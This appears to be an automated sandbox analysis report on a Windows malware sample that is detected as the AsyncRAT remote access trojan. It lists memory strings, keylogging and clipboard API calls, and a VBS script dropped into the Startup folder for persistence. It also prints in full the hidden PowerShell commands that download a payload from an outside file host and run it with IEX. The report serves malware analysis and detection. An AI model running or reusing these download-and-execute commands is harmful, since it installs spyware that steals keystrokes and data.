Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: conhost.exe, 00000008.00000002.491716688.000001E6CD71D000.00000004.00000020.sdmp, powershell.exe, 0000000B.00000002.248780710.00000179D1290000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.493872523.00000133849AF000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 0000000E.00000002.504860764.000001339D2F8000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 0000000E.00000002.492495968.0000013382F94000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab2
Source: powershell.exe, 0000000E.00000002.504860764.000001339D2F8000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enEM32
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp2.g
Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gsH
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.244669019.00000179B8E41000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.494107143.0000013384A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp	String found in binary or memory: http://secure.gl
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Ne - Copy.exe, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmp	String found in binary or memory: https://autohotkey.com
Source: xuXIetZvv6.exe, 00000000.00000000.219549326.00000000006E2000.00000002.00020000.sdmp, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmp	String found in binary or memory: https://autohotkey.comCould
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: xuXIetZvv6.exe, xuXIetZvv6.exe, 00000000.00000000.219734739.00000000007D8000.00000002.00020000.sdmp, wscript.exe, 00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmp, wscript.exe, 00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.492055438.000002F0A12B5000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.245936252.00000179B9330000.00000004.00000001.sdmp	String found in binary or memory: https://gist.githubusercontent.com/kingspy34/2c11abc534523a39b97d60fc60841e8b/raw/1f298839458580e6a8
Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmp	String found in binary or memory: https://www.globalsign.com
Source: conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: https://www.uplooder.net
Source: powershell.exe, 0000000E.00000002.491810873.0000013382F10000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.493315849.00000133830B5000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000002.492495968.0000013382F94000.00000004.00000020.sdmp	String found in binary or memory: https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3
Source: powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp30y
Source: conhost.exe	String found in binary or memory: https://www.vbsedit.com/tr_register.asp?launcher=
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp	String found in binary or memory: https://www.vbsedit.com/tr_register.asp?launcher=openiexplore.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.504520772.000001339CFF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.272338570.0000013386CFC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6920, type: MEMORY
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140006510 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400063F0 GetClipboardFormatNameW,GetClipboardData,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140054730 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,malloc,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140016300 GetTickCount,PeekMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140001B0C GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,PostMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,KillTimer,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\winlogon.vbs, type: DROPPED	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs, type: DROPPED	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth

Dynamically executes javascript script code

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C17CA0 SetFilePointer,ReadFile,CloseHandle,DestroyWindow,GetModuleFileNameW,#2,MessageBoxW,CLSIDFromProgID,CoCreateInstance,#8,CLSIDFromProgID,CoCreateInstance,#4,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C17EB0 SetFilePointer,ReadFile,CloseHandle,SetFilePointer,ReadFile,CloseHandle,DestroyWindow,CLSIDFromProgID,CoCreateInstance,#8,CLSIDFromProgID,CoCreateInstance,#4,#4,CLSIDFromProgID,CoCreateInstance,MessageBoxW,MessageBoxW,MessageBoxW,MessageBoxW,#4,#2,#2,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

Sample or dropped binary is a compiled AutoHotkey binary

Show sources

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Window found: window name: AutoHotkey

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_000000014005EF30: CreateFileW,DeviceIoControl,CloseHandle,

Source: C:\ProgramData\conhost.exe

Code function: 8_2_00007FF7AAFD63C0 GetModuleFileNameW,CreateProcessWithLogonW,GetLastError,FormatMessageW,GetLastError,MessageBoxW,LocalFree,GetLastError,ExitProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CreateThread,CoInitialize,GetActiveWindow,SetLastError,GetCurrentThreadId,EnterCriticalSection,LeaveCriticalSection,DialogBoxParamW,CoUninitialize,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400810B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Code function: 0_2_00007FFA161F4C90
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Code function: 0_2_00007FFA161F0168
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Code function: 0_2_00007FFA161F3280
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001E310
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001EB30
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014000CF50
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140089180
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140005230
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001F300
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400415D0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001F919
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140055950
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140001B0C
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007FC00
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001FD1E
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140124000
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007C03F
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140070060
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D8074
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140028120
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014000A120
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140050135
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005C140
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004C160
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400581A0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report xuXIetZvv6.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary: